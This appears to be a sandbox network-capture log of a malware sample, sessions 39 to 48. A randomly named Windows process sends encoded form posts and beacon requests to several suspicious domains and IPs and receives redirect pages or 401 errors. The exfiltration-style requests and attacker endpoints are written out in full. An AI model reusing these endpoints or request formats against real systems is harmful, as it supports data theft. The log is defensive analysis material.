Data Ascii: qFHlI=N4YjnbeBsaICYnNXKCs2eQNBxODsWuiGH9TY7LpgdsCSibt+3AonKnwPuL67uGYd4ib/oAK6la/oWzPaVZvZmvnyrNMNzFlNoN4FGcPupKVfm6HxJoirdIt3S7vI7OimKIxDZahRuaQ7+6W45lqBmWUbdb73uprVjPiVfXR+putNiyGQjTO/gwJl9x3dfvfEmWQWJ2Cum1D0FldXUfzLT84kFzacK24W3g==


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
39          192.168.2.6  57353        3.33.130.190    80                2656  C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 21, 2024 17:27:23.641599894 CEST  1791               OUT        POST /m7sk/ HTTP/1.1
Host: www.ethetf.digital
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.ethetf.digital
Referer: http://www.ethetf.digital/m7sk/
Content-Length: 1246
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI= [TRUNCATED]


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
40          192.168.2.6  57354        3.33.130.190    80                2656  C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 21, 2024 17:27:26.191431999 CEST  497                OUT        GET /m7sk/?qFHlI=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC8xJPP/rIa82Zn+KkAGuf+vJpb06LBCpCcPbQ0IYrj4c+7eLludaI=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
Host: www.ethetf.digital
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 21, 2024 17:27:26.618349075 CEST  417                IN         HTTP/1.1 200 OK
Server: openresty
Date: Mon, 21 Oct 2024 15:27:26 GMT
Content-Type: text/html
Content-Length: 277
Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 71 46 48 6c 49 3d 41 36 77 44 6b 74 58 4e 2b 71 38 4c 62 47 73 47 41 32 30 44 66 58 31 32 30 4c 66 43 4f 38 6e 75 4e 38 37 74 36 4a 5a 4d 4f 2b 61 34 6f 59 5a 73 2f 51 52 39 41 58 63 6e 32 71 33 44 73 44 6b 4f 76 32 48 63 37 53 71 35 31 4f 48 2b 57 6c 4c 61 4b 4a 43 38 78 4a 50 50 2f 72 49 61 38 32 5a 6e 2b 4b 6b 41 47 75 66 2b 76 4a 70 62 30 36 4c 42 43 70 43 63 50 62 51 30 49 59 72 6a 34 63 2b 37 65 4c 6c 75 64 61 49 3d 26 44 4a 3d 75 4e 78 34 38 6a 64 50 79 76 6d 68 71 74 4d 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?qFHlI=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC8xJPP/rIa82Zn+KkAGuf+vJpb06LBCpCcPbQ0IYrj4c+7eLludaI=&DJ=uNx48jdPyvmhqtM0"}</script></head></html>


                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                           41 | 192.168.2.6 | 57355 | 3.33.130.190 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                           Oct 21, 2024 17:27:31.683005095 CEST | 748 | OUT | POST /12c7/ HTTP/1.1
                                                                                                                          Host: www.booosted.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.booosted.xyz
                                                                                                                          Referer: http://www.booosted.xyz/12c7/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 61 31 71 4d 77 53 75 6a 4b 47 44 76 78 4e 4f 57 4b 72 5a 7a 76 77 46 49 44 35 48 63 39 64 30 70 57 4b 57 37 4a 51 76 79 67 56 61 55 49 6f 72 2f 33 4a 38 54 45 70 51 51 61 78 59 63 6b 61 49 43 73 36 6e 59 72 48 79 4b 44 6c 39 38 57 30 41 71 79 46 66 41 74 41 58 71 4e 76 37 69 42 7a 42 4f 63 63 2b 49 6a 4b 31 6a 6c 51 4a 35 4f 64 78 50 68 64 79 54 68 54 33 6f 47 53 36 76 77 34 31 31 33 32 43 63 74 4c 55 53 47 5a 74 45 46 49 6c 2b 74 35 48 79 61 2f 44 6b 33 70 62 55 46 39 7a 36 78 2b 31 67 42 55 37 43 75 61 44 59 7a 4e 34 49 48 54 43 77 75 6e 50 74 53 47 4c 49 64 44 54 71
                                                                                                                          Data Ascii: qFHlI=mmiLmwXyfZXga1qMwSujKGDvxNOWKrZzvwFID5Hc9d0pWKW7JQvygVaUIor/3J8TEpQQaxYckaICs6nYrHyKDl98W0AqyFfAtAXqNv7iBzBOcc+IjK1jlQJ5OdxPhdyThT3oGS6vw41132CctLUSGZtEFIl+t5Hya/Dk3pbUF9z6x+1gBU7CuaDYzN4IHTCwunPtSGLIdDTq


                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                           42 | 192.168.2.6 | 57356 | 3.33.130.190 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                           Oct 21, 2024 17:27:34.225598097 CEST | 772 | OUT | POST /12c7/ HTTP/1.1
                                                                                                                          Host: www.booosted.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.booosted.xyz
                                                                                                                          Referer: http://www.booosted.xyz/12c7/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 62 56 36 4d 38 56 61 6a 64 57 44 73 6f 39 4f 57 41 4c 5a 33 76 77 4a 49 44 35 76 4d 39 76 67 70 52 72 6d 37 49 56 62 79 6a 56 61 55 44 49 72 77 36 70 38 45 45 6f 74 6a 61 77 6b 63 6b 61 4d 43 73 37 33 59 72 77 6d 4c 44 31 39 36 65 55 41 30 78 31 66 41 74 41 58 71 4e 76 2b 35 42 7a 70 4f 63 50 32 49 6c 72 31 73 6f 77 4a 36 4a 64 78 50 6c 64 79 74 68 54 33 77 47 58 62 4b 77 36 39 31 33 30 61 63 71 65 6f 52 4e 5a 74 34 62 34 6b 78 74 70 75 47 51 39 2f 68 77 35 7a 59 65 38 4b 66 30 49 30 36 64 6e 37 68 38 4b 6a 61 7a 50 67 36 48 7a 43 61 73 6e 33 74 41 52 48 76 53 33 32 4a 48 58 52 4d 53 5a 4d 4b 33 41 30 54 77 4c 39 70 52 53 58 45 6a 67 3d 3d
                                                                                                                          Data Ascii: qFHlI=mmiLmwXyfZXgbV6M8VajdWDso9OWALZ3vwJID5vM9vgpRrm7IVbyjVaUDIrw6p8EEotjawkckaMCs73YrwmLD196eUA0x1fAtAXqNv+5BzpOcP2Ilr1sowJ6JdxPldythT3wGXbKw69130acqeoRNZt4b4kxtpuGQ9/hw5zYe8Kf0I06dn7h8KjazPg6HzCasn3tARHvS32JHXRMSZMK3A0TwL9pRSXEjg==


                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                           43 | 192.168.2.6 | 57357 | 3.33.130.190 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                           Oct 21, 2024 17:27:36.771065950 CEST | 1785 | OUT | POST /12c7/ HTTP/1.1
                                                                                                                          Host: www.booosted.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.booosted.xyz
                                                                                                                          Referer: http://www.booosted.xyz/12c7/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 62 56 36 4d 38 56 61 6a 64 57 44 73 6f 39 4f 57 41 4c 5a 33 76 77 4a 49 44 35 76 4d 39 76 34 70 57 59 2b 37 4b 32 7a 79 69 56 61 55 41 49 71 33 36 70 38 38 45 6f 31 76 61 77 6f 69 6b 66 51 43 74 5a 76 59 69 6b 4b 4c 4a 31 39 36 53 30 41 31 79 46 66 56 74 41 6e 55 4e 76 4f 35 42 7a 70 4f 63 4f 47 49 6d 36 31 73 75 77 4a 35 4f 64 78 35 68 64 79 57 68 54 76 67 47 58 57 2f 7a 4c 64 31 79 6b 4b 63 6f 73 41 52 45 5a 74 36 61 34 6c 75 74 70 79 5a 51 35 65 59 77 35 32 31 65 2f 57 66 32 50 78 65 59 7a 6a 6d 6f 4b 37 68 6e 34 59 66 4c 44 32 32 32 45 48 30 45 48 57 65 59 6d 47 4b 4c 44 4a 48 53 62 56 74 77 79 41 34 37 39 49 43 62 41 43 66 32 35 47 6d 30 2f 48 63 58 2f 48 67 4e 63 59 72 6b 7a 58 31 58 32 71 74 48 6d 47 52 57 47 6a 57 44 48 69 47 6c 68 42 79 64 53 44 46 45 6f 77 71 76 33 4a 71 4b 6a 61 44 57 6b 30 7a 58 45 6d 70 36 53 6d 42 41 7a 4a 30 55 43 61 48 30 4a 4e 6f 2b 2b 6e 55 4d 42 4a 64 6e 74 39 35 70 4f 68 66 44 32 78 61 37 37 55 71 69 55 49 4f [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=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 [TRUNCATED]


                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                           44 | 192.168.2.6 | 57358 | 3.33.130.190 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                           Oct 21, 2024 17:27:39.314145088 CEST | 495 | OUT | GET /12c7/?qFHlI=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqLWVeQHwe4Xrlx3fbLdvyLDYZde2riYRc/AFjVf5IhMWO0SHTC3s=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.booosted.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                           Oct 21, 2024 17:27:39.729233980 CEST | 417 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: openresty
                                                                                                                          Date: Mon, 21 Oct 2024 15:27:39 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 277
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 71 46 48 6c 49 3d 72 6b 4b 72 6c 41 65 38 50 4d 33 32 52 6c 79 72 34 79 69 62 41 78 44 77 37 4b 47 4b 4b 4d 49 39 6c 6a 52 33 45 71 72 6a 35 63 59 48 59 62 4f 34 49 67 4c 2f 76 43 61 66 56 71 37 36 78 73 49 57 4f 4d 31 52 59 52 34 68 31 75 73 4e 36 74 36 72 68 67 4c 71 4c 57 56 65 51 48 77 65 34 58 72 6c 78 33 66 62 4c 64 76 79 4c 44 59 5a 64 65 32 72 69 59 52 63 2f 41 46 6a 56 66 35 49 68 4d 57 4f 30 53 48 54 43 33 73 3d 26 44 4a 3d 75 4e 78 34 38 6a 64 50 79 76 6d 68 71 74 4d 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?qFHlI=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqLWVeQHwe4Xrlx3fbLdvyLDYZde2riYRc/AFjVf5IhMWO0SHTC3s=&DJ=uNx48jdPyvmhqtM0"}</script></head></html>


                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                           45 | 192.168.2.6 | 57359 | 8.210.49.139 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                           Oct 21, 2024 17:27:45.694704056 CEST | 751 | OUT | POST /0628/ HTTP/1.1
                                                                                                                          Host: www.djazdgc.tokyo
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.djazdgc.tokyo
                                                                                                                          Referer: http://www.djazdgc.tokyo/0628/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6a 66 39 76 76 70 6b 70 59 58 42 6d 79 74 6d 32 4a 5a 35 4a 51 41 7a 61 7a 50 43 42 74 59 2f 74 50 51 4a 75 45 55 67 75 66 56 65 45 39 5a 35 76 54 65 37 7a 2b 6f 72 4f 49 5a 61 43 57 33 47 2b 57 44 38 70 69 4f 68 69 59 61 41 42 78 39 44 2b 76 4d 62 50 46 7a 4d 51 5a 62 73 62 4a 74 6b 62 42 67 73 51 42 6b 6c 47 39 4c 6b 30 4f 6a 4e 42 59 68 32 35 61 55 67 6e 6f 48 78 62 7a 78 62 72 6b 47 67 54 79 48 4c 50 6f 64 73 5a 48 4c 4c 31 58 6c 78 4a 77 72 38 54 75 74 6a 35 4b 41 6f 32 49 59 51 6a 73 34 6a 50 39 4a 4d 43 41 41 39 7a 36 46 2b 46 34 79 56 59 61 70 79 53 41 34 52 78 6f 59 2f 46 34 30 57 77 31 4d 32 47
                                                                                                                          Data Ascii: qFHlI=jf9vvpkpYXBmytm2JZ5JQAzazPCBtY/tPQJuEUgufVeE9Z5vTe7z+orOIZaCW3G+WD8piOhiYaABx9D+vMbPFzMQZbsbJtkbBgsQBklG9Lk0OjNBYh25aUgnoHxbzxbrkGgTyHLPodsZHLL1XlxJwr8Tutj5KAo2IYQjs4jP9JMCAA9z6F+F4yVYapySA4RxoY/F40Ww1M2G
                                                                                                                           Oct 21, 2024 17:27:46.458865881 CEST | 507 | IN | HTTP/1.1 200
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:27:46 GMT
                                                                                                                          Content-Type: application/json;charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Origin
                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                          Access-Control-Allow-Origin: http://www.djazdgc.tokyo
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 54{"msg":"/0628/","code":401}0


                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                           46 | 192.168.2.6 | 57360 | 8.210.49.139 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                           Oct 21, 2024 17:27:48.243247986 CEST | 775 | OUT | POST /0628/ HTTP/1.1
                                                                                                                          Host: www.djazdgc.tokyo
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.djazdgc.tokyo
                                                                                                                          Referer: http://www.djazdgc.tokyo/0628/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6a 66 39 76 76 70 6b 70 59 58 42 6d 30 35 69 32 4d 36 52 4a 53 67 7a 62 71 50 43 42 69 34 2f 70 50 51 56 75 45 56 6b 2b 59 6e 4b 45 39 35 4a 76 53 62 48 7a 2f 6f 72 4f 63 4a 61 48 5a 58 47 50 57 43 41 50 69 4d 6c 69 59 61 55 42 78 35 50 2b 73 39 62 4d 4b 44 4d 53 57 37 73 64 47 4e 6b 62 42 67 73 51 42 6b 78 2f 39 4c 4d 30 4f 77 56 42 5a 46 71 36 58 30 67 67 38 58 78 62 35 52 62 76 6b 47 68 30 79 47 6e 6c 6f 66 45 5a 48 4f 33 31 55 33 5a 4f 70 62 39 57 6a 4e 69 46 62 78 31 38 4f 65 46 79 79 36 50 4f 72 70 41 33 46 32 38 70 6d 32 2b 6d 71 69 31 61 61 72 71 67 41 59 52 62 71 59 48 46 71 6a 61 58 36 34 54 6c 62 51 62 58 49 66 4c 4d 67 39 32 6f 61 4e 6c 4e 42 72 6b 5a 48 77 3d 3d
                                                                                                                          Data Ascii: qFHlI=jf9vvpkpYXBm05i2M6RJSgzbqPCBi4/pPQVuEVk+YnKE95JvSbHz/orOcJaHZXGPWCAPiMliYaUBx5P+s9bMKDMSW7sdGNkbBgsQBkx/9LM0OwVBZFq6X0gg8Xxb5RbvkGh0yGnlofEZHO31U3ZOpb9WjNiFbx18OeFyy6POrpA3F28pm2+mqi1aarqgAYRbqYHFqjaX64TlbQbXIfLMg92oaNlNBrkZHw==
                                                                                                                           Oct 21, 2024 17:27:49.030792952 CEST | 502 | IN | HTTP/1.1 200
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:27:48 GMT
                                                                                                                          Content-Type: application/json;charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Origin
                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                          Access-Control-Allow-Origin: http://www.djazdgc.tokyo
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                                                          Data Ascii: 54{"msg":"/0628/","code":401}
                                                                                                                           Oct 21, 2024 17:27:49.030817032 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                           47 | 192.168.2.6 | 57361 | 8.210.49.139 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                           Oct 21, 2024 17:27:50.787072897 CEST | 1788 | OUT | POST /0628/ HTTP/1.1
                                                                                                                          Host: www.djazdgc.tokyo
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.djazdgc.tokyo
                                                                                                                          Referer: http://www.djazdgc.tokyo/0628/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6a 66 39 76 76 70 6b 70 59 58 42 6d 30 35 69 32 4d 36 52 4a 53 67 7a 62 71 50 43 42 69 34 2f 70 50 51 56 75 45 56 6b 2b 59 6e 79 45 39 4b 42 76 51 34 76 7a 6c 6f 72 4f 66 4a 61 47 5a 58 47 53 57 44 6f 54 69 4d 70 79 59 59 73 42 77 63 54 2b 6e 70 48 4d 52 7a 4d 53 55 37 73 59 4a 74 6b 4f 42 67 38 55 42 6b 68 2f 39 4c 4d 30 4f 78 6c 42 4e 68 32 36 45 6b 67 6e 6f 48 78 58 7a 78 62 58 6b 48 46 4f 79 47 54 66 6f 50 6b 5a 45 75 48 31 48 7a 35 4f 32 72 39 59 67 4e 69 64 62 78 35 2f 4f 61 6c 2b 79 36 58 67 72 75 49 33 45 53 74 6d 78 56 79 2f 78 52 46 65 48 4c 75 63 59 2f 4d 6c 71 4b 58 6c 6a 53 53 36 36 37 58 54 57 55 54 52 64 49 69 44 6e 64 2b 6d 56 71 67 4f 45 49 31 39 57 44 4f 73 6a 31 4d 63 38 6f 35 52 41 63 49 39 65 65 64 32 6b 35 6f 59 7a 44 4b 78 31 7a 34 6b 38 46 7a 7a 7a 32 6e 38 73 30 6d 35 6c 79 44 50 35 43 64 38 39 33 38 6d 6d 31 39 75 54 72 61 5a 4c 51 35 64 71 64 49 4d 4e 53 72 77 71 51 54 75 73 68 61 5a 35 78 6d 62 4b 35 36 61 33 4f 6d 5a 6f 69 41 47 54 76 35 36 4a 30 44 64 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=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 [TRUNCATED]
                                                                                                                          Oct 21, 2024 17:27:51.575293064 CEST | 502 bytes | IN | HTTP/1.1 200
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:27:51 GMT
                                                                                                                          Content-Type: application/json;charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Origin
                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                          Access-Control-Allow-Origin: http://www.djazdgc.tokyo
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                                                          Data Ascii: 54{"msg":"请求访问：/0628/，认证失败，无法访问系统资源","code":401}
                                                                                                                          (the msg string, decoded from the UTF-8 bytes in Data Raw, reads in English: "Requested access: /0628/, authentication failed, unable to access system resources")
                                                                                                                          Oct 21, 2024 17:27:51.575453043 CEST | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          48 | 192.168.2.6 | 57362 | 8.210.49.139 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 21, 2024 17:27:53.328782082 CEST | 496 bytes | OUT | GET /0628/?qFHlI=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+FigCVrQtCrgnSlgUA2JT078+MxZtZD+kFHsD8UJb6CndygVk2Aw=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.djazdgc.tokyo
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
